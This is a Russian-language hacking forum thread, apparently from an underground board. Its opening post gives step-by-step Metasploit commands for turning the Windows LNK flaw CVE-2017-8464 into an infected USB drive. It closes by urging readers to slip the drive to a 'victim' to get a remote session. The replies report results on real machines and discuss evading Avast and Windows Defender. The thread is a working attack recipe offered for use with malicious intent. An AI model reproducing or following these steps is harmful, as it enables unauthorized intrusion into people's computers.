/bad USB CVE_2017_8464\ _ # by Ondrik8

Всем привет, смотрю пошла у нас движуха с USB девайсами для заражения жертв, ну думаю "че я лысый?) в трэнде нужно быть!" Правильно?_) Вот и представлю Вашему вниманию очередной способ заражения от меня)
Нам потребуется 5 минут USB - накопитель, Kali-linux и так едем... сюда !

уязвимые ОС-и

переименовываем и телепортируем в метасплойт:

mv 42382 CVE_2017_8464_LNK_Rce.rb

mv CVE_2017_8464_LNK_Rce.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

запускаем MSF и обновляемся командой: reload_all и...

exploit -j

далее, настраиваем под себя уязвимость:

use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce

можете еще и порт настроить под себя, жмем: exploit

MSF сгенерит файлы, откроем скрытую папку где они лежат) командой: xdg-open /root/.msf4/local/

перенесем их в нашу злую USB-flash-ку )) и подсунем флэшку "жертве прогресса"!)) Как только "жертва" откроет у себя на компе для просмотра содержимого, у Вас появится заветная сессия!))

Удачи!

 

[ghost]

Заработало!

 

[adm2]

Как держать это всё в голове и понять какую из 1983746 уязвимостей применить в данный конкретный момент?

 

[persivald]

Как держать это всё в голове и понять какую из 1983746 уязвимостей применить в данный конкретный момент?

а не надо ничего в голове держать) для этого есть сканеры)

 

[ghost]

Avast палит и жрет файлы.

 

[TrevorReznik]

на вин 7 x64 при приподключении флешки крашится проводник... консоль пипишет сессия начата, но шелл не дает, через некоторе время сессия умирает. На вин 10 х64 файлы сожрал "Защитник виндоус", после его отключения система не сбоила , но сессию я не получил. Тестил на реальных тачках не на виртуальных. Да и Аваст тоже файлы сожрал(((

 

[erlan1749]

может нужно с руби дак запускать, а не с обычной флэшки, тогда я думаю получиться.

 

[pr0phet]

Насколько я понимаю, если использовать meterpreter - любой антивирус уже его задетектит. Какой смысл от экспериментов?